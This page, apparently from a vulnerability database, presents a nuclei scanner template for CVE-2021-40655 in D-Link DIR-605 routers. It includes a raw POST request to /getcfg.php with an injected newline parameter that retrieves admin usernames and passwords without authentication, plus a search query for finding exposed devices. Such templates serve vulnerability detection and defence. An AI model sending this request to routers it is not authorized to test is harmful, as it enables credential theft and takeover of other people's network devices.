Lucene search
K

D-Link DIR-605 - Information Disclosure

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

High severity information disclosure in D-Link DIR-605 firmware allows password retrieval via post request.

Related
Refs
Code
id: CVE-2021-40655

info:
  name: D-Link DIR-605 - Information Disclosure
  author: DhiyaneshDK
  severity: high
  description: |
    An informtion disclosure issue exists in D-LINK-DIR-605 B2 Firmware Version - 2.01MT. An attacker can obtain a user name and password by forging a post request to the / getcfg.php page
  impact: |
    Unauthenticated attackers can obtain router credentials including usernames and passwords by exploiting information disclosure in the getcfg.php endpoint.
  remediation: |
    Apply firmware updates provided by D-Link or replace the device with a supported model.
  reference:
    - https://nvd.nist.gov/vuln/detail/cve-2021-40655
    - https://github.com/Ilovewomen/D-LINK-DIR-605/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-40655
    cwe-id: CWE-863
    epss-score: 0.87039
    epss-percentile: 0.99726
    cpe: cpe:2.3:o:dlink:dir-605l_firmware:2.01mt:*:*:*:*:*:*:*
  metadata:
    vendor: dlink
    product: dir-605l_firmware
    fofa-query: body="l_tb>DIR-605"
    max-request: 1
  tags: cve,cve2021,dlink,kev,dir-605,info-leak,vkev,vuln

http:
  - raw:
      - |
        POST /getcfg.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie:
        X-Forwarded-For: 127.0.0.1

        SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/xml")'
          - 'contains(body, "DEVICE.ACCOUNT")'
        condition: and
# digest: 4a0a00473045022016c2a59df2db17e059d802dd3c4abcf4eefa5c842e58e774b5be91a98337fd42022100d19a5c129d5f2baf37f42ab4ad2882d2e9f5b29eb906d41d7297e7fc8f3c49d5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 25
CVSS 3.17.5
EPSS0.87039
SSVC
25